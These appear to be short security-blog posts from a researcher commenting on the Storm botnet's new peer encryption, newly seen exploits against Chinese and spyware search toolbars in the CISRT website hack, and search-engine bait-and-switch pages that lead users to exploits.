And the other shoe drops ...

Hi folks,

Our respected colleague, Joe Stewart, has noticed that Storm is now using encryption (albeit trivial) to communicate with its peers. What this means is that Storm bots can only communicate with other Storm bots that know that key. He speculates that this might be a precursor to selling off chunks of the botnet!

This fits perfectly with what we noticed, whereby Storm had been ... vigorous... but was now quiet. It felt, to us, that they were planning/ changing something, and this would make perfect sense.

What this means to everyone is that we can look forward to even _increased_ Storm botnet activity, as other groups try to use it for their various and nefarious purposes.

Interesting times, folks.

Cheers

Roger

Waiting for the other shoe to drop

Hi folks,

This has been a really busy couple of weeks with hacked websites, new exploits, and improved encryption all over the place... we see most of the different groups working hard with the exception of the Storm guys.

Given how active they've been in the past, creating new lure pages every few days, sending huge amounts of spam, and sometimes creating new versions of their bots every few minutes, one has to wonder where they are?

It'd be nice to think they've given up, and got legit jobs, but one has to wonder if this is simply the proverbial calm before the (new) Storm.

Cheers

Roger

Cisrt hack

Hi folks,

The most interesting part of this story has been poorly reported, as far as we can see, and that is that at least two of the many exploits being fired by the exploit servers in this hack are brand new! (0-days by some definitions, but probably more correctly Undercover Exploits)

One exploit impacts the Baidu Soba searchbar, (Apparently Baidu is a popular Chinese search engine, and they make a searchbar) which isn't going to impact non-Chinese users too much, but given that CISRT is the Chinese Internet Security Response Team, there's a fair chance it got a bunch of local victims before it was cleaned up.

The second new exploit seemingly targets another third-party toolbar. It's not 100% clear at this point, but the clsid seems to be the OcSearchAssistant (spyware) searchbar. This is kind of funny, because it means it was targetting stuff that was probably installed by slightly nefarious means in the first place. I thought there was honor among thieves.

These bring to four the number of new 3rd party dll exploits in use for the first time, in just about one month. It seems an idea that is Catching On (tm).

The third under-reported side to this is the sheer complexity of the encryption being used to obfuscate the exploits. We have still not decrypted some of them, so there could well be more surprises to be found.

Cheers

Roger

More google stuff

Hi folks,

Here is a video we made some time ago, and only recent decided to publish it, mostly because some other folk have noticed it too. It's called Playing Bait and Switch with the search engines. Basically what happens is that the Bad Guys create a new website and load it up with pages of keywords ... some porno, some startlingly innocent. They give it a week or so to allow all the search bots to find and index them, and then switch it out to either an exploit or a social engineering trick.

The result is that really innocent searches take unwary users to really dangerous places.

Cheers

Roger